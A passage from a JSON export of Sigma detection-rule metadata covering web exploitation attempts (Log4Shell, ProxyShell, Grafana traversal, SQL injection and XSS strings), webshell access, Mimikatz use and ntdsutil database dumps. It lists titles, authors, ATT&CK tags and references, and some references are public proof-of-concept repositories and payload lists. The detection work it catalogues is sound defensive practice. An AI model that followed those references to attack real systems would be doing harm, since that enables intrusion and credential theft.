"20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f", - "value": "Sitecore Pre-Auth RCE CVE-2021-42237", - "meta": { - "refs": [ - "https://blog.assetnote.io/2021/11/02/sitecore-rce/", - "https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_42237_sitecore_report_ashx.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/11/17", - "filename": "web_cve_2021_42237_sitecore_report_ashx.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Vulnerability Scanning" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects a successful Grafana path traversal exploitation", - "uuid": "7b72b328-5708-414f-9a2a-6a6867c26e16", - "value": "Grafana Path Traversal Exploitation CVE-2021-43798", - "meta": { - "refs": [ - "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", - "https://github.com/search?q=CVE-2021-43798", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/12/08", - "filename": "web_cve_2021_43798_grafana.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)", - "uuid": "5ea8faa8-db8b-45be-89b0-151b84c82702", - "value": "Log4j RCE CVE-2021-44228 Generic", - "meta": { - "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://news.ycombinator.com/item?id=29504755", - "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", - "https://github.com/YfryTchsGD/Log4jAttackSurface", - "https://twitter.com/shutingrz/status/1469255861394866177?s=21", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/12/10", - "filename": "web_cve_2021_44228_log4j.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Vulnerability scanning" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)", - "uuid": "9be472ed-893c-4ec0-94da-312d2765f654", - "value": "Log4j RCE CVE-2021-44228 in Fields", - "meta": { - "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://news.ycombinator.com/item?id=29504755", - "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", - "https://github.com/YfryTchsGD/Log4jAttackSurface", - "https://twitter.com/shutingrz/status/1469255861394866177?s=21", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/12/10", - "filename": "web_cve_2021_44228_log4j_fields.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Vulnerability scanning" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects an attempt to leverage the vulnerable servlet \"mboximport\" for an unauthenticated remote command injection", - "uuid": "dd218fb6-4d02-42dc-85f0-a0a376072efd", - "value": "Zimbra Collaboration Suite Email Server Unauthenticated RCE", - "meta": { - "refs": [ - "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", - "https://www.yang99.top/index.php/archives/82/", - "https://github.com/vnhacker1337/CVE-2022-27925-PoC", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2022.27925" - ], - "creation_date": "2022/08/17", - "filename": "web_cve_2022_27925_exploit.yml", - "author": "@gott_cyber", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.\nA malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n", - "uuid": "fcf1101d-07c9-49b2-ad81-7e421ff96d80", - "value": "CVE-2022-31656 VMware Workspace ONE Access Auth Bypass", - "meta": { - "refs": [ - "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31656_auth_bypass.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2022/08/12", - "filename": "web_cve_2022_31656_auth_bypass.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Vulnerability scanners" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659", - "uuid": "efdb2003-a922-48aa-8f37-8b80021a9706", - "value": "CVE-2022-31659 VMware Workspace ONE Access RCE", - "meta": { - "refs": [ - "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31659_vmware_rce.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2022/08/12", - "filename": "web_cve_2022_31659_vmware_rce.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Vulnerability scanners", - "Legitimate access to the URI" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective", - "uuid": "1a9a04fd-02d1-465c-abad-d733fd409f9c", - "value": "Apache Spark Shell Command Injection - Weblogs", - "meta": { - "refs": [ - "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", - "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", - "https://github.com/apache/spark/pull/36315/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_33891_spark_shell_command_injection.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2022.33891" - ], - "creation_date": "2022/07/19", - "filename": "web_cve_2022_33891_spark_shell_command_injection.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Web vulnerability scanners" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804", - "uuid": "65c0a0ab-d675-4441-bd6b-d3db226a2685", - "value": "Atlassian Bitbucket Command Injection Via Archive API", - "meta": { - "refs": [ - "https://twitter.com/_0xf4n9x_/status/1572052954538192901", - "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", - "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html", - "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2022.36804" - ], - "creation_date": "2022/09/29", - "filename": "web_cve_2022_36804_atlassian_bitbucket_command_injection.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Web vulnerability scanners" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity", - "uuid": "67bce556-312f-4c81-9162-c3c9ff2599b2", - "value": "Exchange Exploitation Used by HAFNIUM", - "meta": { - "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_exploitation_hafnium.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/03/03", - "filename": "web_exchange_exploitation_hafnium.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)", - "uuid": "23eee45e-933b-49f9-ae1b-df706d2d52ef", - "value": "Exchange ProxyShell Pattern", - "meta": { - "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2231", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/08/07", - "filename": "web_exchange_proxyshell.yml", - "author": "Florian Roth, Rich Warren", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers", - "uuid": "992be1eb-e5da-437e-9a54-6d13b57bb4d8", - "value": "Successful Exchange ProxyShell Attack", - "meta": { - "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2231", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell_successful.yml" - ], - "tags": [ - "attack.initial_access" - ], - "creation_date": "2021/08/09", - "filename": "web_exchange_proxyshell_successful.yml", - "author": "Florian Roth, Rich Warren", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"", - "uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac", - "value": "Successful IIS Shortname Fuzzing Scan", - "meta": { - "refs": [ - "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", - "https://www.exploit-db.com/exploits/19525", - "https://github.com/lijiejie/IIS_shortname_Scanner", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/10/06", - "filename": "web_iis_tilt_shortname_scan.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects possible Java payloads in web access logs", - "uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", - "value": "Java Payload Strings", - "meta": { - "refs": [ - "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", - "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", - "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", - "https://twitter.com/httpvoid0x2f/status/1532924261035384832", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml" - ], - "tags": [ - "cve.2022.26134", - "cve.2021.26084" - ], - "creation_date": "2022/06/04", - "filename": "web_java_payload_in_access_logs.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate apps" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects exploitation attempt using the JDNIExploiit Kit", - "uuid": "412d55bc-7737-4d25-9542-5b396867ce55", - "value": "JNDIExploit Pattern", - "meta": { - "refs": [ - "https://github.com/pimps/JNDI-Exploit-Kit", - "https://githubmemory.com/repo/FunctFan/JNDIExploit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_jndi_exploit.yml" - ], - "tags": "No established tags", - "creation_date": "2021/12/12", - "filename": "web_jndi_exploit.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate apps the use these paths" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects possible exploitation activity or bugs in a web application", - "uuid": "6fdfc796-06b3-46e8-af08-58f3505318af", - "value": "Multiple Suspicious Resp Codes Caused by Single Client", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_multiple_susp_resp_codes_single_source.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2017/02/19", - "filename": "web_multiple_susp_resp_codes_single_source.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Unstable application", - "Application that misuses the response codes" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", - "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56", - "value": "Nginx Core Dump", - "meta": { - "refs": [ - "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", - "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499.004" - ], - "creation_date": "2021/05/31", - "filename": "web_nginx_core_dump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Serious issues with a configuration or plugin" - ], - "logsource.category": "No established category", - "logsource.product": "No established product" - } - }, - { - "description": "Detects path traversal exploitation attempts", - "uuid": "7745c2ea-24a5-4290-b680-04359cb84b35", - "value": "Path Traversal Exploitation Attempts", - "meta": { - "refs": [ - "https://github.com/projectdiscovery/nuclei-templates", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_path_traversal_exploitation_attempt.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/09/25", - "filename": "web_path_traversal_exploitation_attempt.yml", - "author": "Subhash Popuri (@pbssubhash), Florian Roth (generalisation)", - "level": "medium", - "falsepositive": [ - "Happens all the time on systems exposed to the Internet", - "Internal vulnerability scanners" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects access to SUPERNOVA webshell as described in Guidepoint report", - "uuid": "a2cee20b-eacc-459f-861d-c02e5d12f1db", - "value": "Solarwinds SUPERNOVA Webshell Access", - "meta": { - "refs": [ - "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", - "https://www.anquanke.com/post/id/226029", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2020/12/17", - "filename": "web_solarwinds_supernova_webshell.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects exploitation attempts of the SonicWall Jarrewrite Exploit", - "uuid": "6f55f047-112b-4101-ad32-43913f52db46", - "value": "SonicWall SSL/VPN Jarrewrite Exploit", - "meta": { - "refs": [ - "https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sonicwall_jarrewrite_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access" - ], - "creation_date": "2021/01/25", - "filename": "web_sonicwall_jarrewrite_exploit.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", - "uuid": "953d460b-f810-420a-97a2-cfca4c98e602", - "value": "Source Code Enumeration Detection by Keyword", - "meta": { - "refs": [ - "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", - "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_source_code_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ], - "creation_date": "2019/06/08", - "filename": "web_source_code_enumeration.yml", - "author": "James Ahearn", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects SQL Injection attempts via GET requests in access logs", - "uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", - "value": "SQL Injection Strings", - "meta": { - "refs": [ - "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", - "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", - "https://brightsec.com/blog/sql-injection-payloads/", - "https://github.com/payloadbox/sql-injection-payload-list", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml" - ], - "tags": "No established tags", - "creation_date": "2020/02/22", - "filename": "web_sql_injection_in_access_logs.yml", - "author": "Saw Win Naung, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Java scripts and CSS Files", - "User searches in search boxes of the respective website", - "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects SSTI attempts sent via GET requests in access logs", - "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", - "value": "Server Side Template Injection Strings", - "meta": { - "refs": [ - "https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", - "https://github.com/payloadbox/ssti-payloads", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_ssti_in_access_logs.yml" - ], - "tags": "No established tags", - "creation_date": "2022/06/14", - "filename": "web_ssti_in_access_logs.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "User searches in search boxes of the respective website", - "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects known suspicious (default) user-agents related to scanning/recon tools", - "uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a", - "value": "Suspicious User-Agents Related To Recon Tools", - "meta": { - "refs": [ - "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", - "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", - "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2022/07/19", - "filename": "web_susp_useragents.yml", - "author": "Nasreddine Bencherchali, Tim Shelton", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication", - "uuid": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", - "value": "Suspicious Windows Strings In URI", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_windows_path_uri.yml" - ], - "tags": [ - "attack.persistence", - "attack.exfiltration", - "attack.t1505.003" - ], - "creation_date": "2022/06/06", - "filename": "web_susp_windows_path_uri.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate application and websites that use windows paths in their URL" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects access to DEWMODE webshell as described in FIREEYE report", - "uuid": "fdf96c90-42d5-4406-8a9c-14a2c9a016b5", - "value": "DEWMODE Webshell Access", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_unc2546_dewmode_php_webshell.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2021/02/22", - "filename": "web_unc2546_dewmode_php_webshell.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.", - "uuid": "2ea44a60-cfda-11ea-87d0-0242ac130003", - "value": "Webshell ReGeorg Detection Via Web Logs", - "meta": { - "refs": [ - "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", - "https://github.com/sensepost/reGeorg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_webshell_regeorg.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2020/08/04", - "filename": "web_webshell_regeorg.yml", - "author": "Cian Heasley", - "level": "high", - "falsepositive": [ - "Web applications that use the same URL parameters as ReGeorg" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Windows Webshells that use GET requests via access logs", - "uuid": "7ff9db12-1b94-4a79-ba68-a2402c5d6729", - "value": "Windows Webshell Strings", - "meta": { - "refs": [ - "https://bad-jubies.github.io/RCE-NOW-WHAT/", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_win_webshells_in_access_logs.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2017/02/19", - "filename": "web_win_webshells_in_access_logs.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Web sites like wikis with articles on os commands and pages that include the os commands in the URLs", - "User searches in search boxes of the respective website" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects XSS attempts injected via GET requests in access logs", - "uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409", - "value": "Cross Site Scripting Strings", - "meta": { - "refs": [ - "https://github.com/payloadbox/xss-payload-list", - "https://portswigger.net/web-security/cross-site-scripting/contexts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_xss_in_access_logs.yml" - ], - "tags": "No established tags", - "creation_date": "2021/08/15", - "filename": "web_xss_in_access_logs.yml", - "author": "Saw Win Naung, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "JavaScripts,CSS Files and PNG files", - "User searches in search boxes of the respective website", - "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)", - "uuid": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", - "value": "Mimikatz Use", - "meta": { - "refs": [ - "https://tools.thehacker.recipes/mimikatz/modules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/win_alert_mimikatz_keywords.yml" - ], - "tags": [ - "attack.s0002", - "attack.lateral_movement", - "attack.credential_access", - "car.2013-07-001", - "car.2019-04-004", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.001", - "attack.t1003.006" - ], - "creation_date": "2017/01/10", - "filename": "win_alert_mimikatz_keywords.yml", - "author": "Florian Roth (rule), David ANDRE (additional keywords)", - "level": "high", - "falsepositive": [ - "Naughty administrators", - "AV Signature updates", - "Files with Mimikatz in their filename" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "uuid": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", - "value": "Audit CVE Event", - "meta": { - "refs": [ - "https://twitter.com/VM_vivisector/status/1217190929330655232", - "https://twitter.com/DidierStevens/status/1217533958096924676", - "https://twitter.com/FlemmingRiis/status/1217147415482060800", - "https://www.youtube.com/watch?v=ebmW42YYveI", - "https://nullsec.us/windows-event-log-audit-cve/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", - "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", - "attack.impact", - "attack.t1499.004" - ], - "creation_date": "2020/01/15", - "filename": "win_audit_cve.yml", - "author": "Florian Roth, Zach Mathis", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This detection method points out highly relevant Antivirus events", - "uuid": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", - "value": "Relevant Anti-Virus Event", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", - "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", - "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588" - ], - "creation_date": "2017/02/19", - "filename": "win_av_relevant_match.yml", - "author": "Florian Roth, Arnim Rupp", - "level": "high", - "falsepositive": [ - "Some software piracy tools (key generators, cracks) are classified as hack tools" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "An application has been removed. Check if it is critical.", - "uuid": "570ae5ec-33dc-427c-b815-db86228ad43e", - "value": "Application Uninstalled", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_builtin_remove_application.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ], - "creation_date": "2022/01/28", - "filename": "win_builtin_remove_application.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", - "uuid": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", - "value": "Ntdsutil Abuse", - "meta": { - "refs": [ - "https://twitter.com/mgreen27/status/1558223256704122882", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/14", - "filename": "win_esent_ntdsutil_abuse.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate backup operation/creating shadow copies" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", - "uuid": "94dc4390-6b7c-4784-8ffc-335334404650", - "value": "Dump Ntds.dit To Suspicious Location", - "meta": { - "refs": [ - "https://twitter.com/mgreen27/status/1558223256704122882", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/14", - "filename": "win_esent_ntdsutil_abuse_susp_location.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate backup operation/creating shadow copies" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects MSI package installation from suspicious locations", - "uuid": "c7c8aa1c-5aff-408e-828b-998e3620b341", - "value": "MSI Installation From Suspicious Locations", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/31", 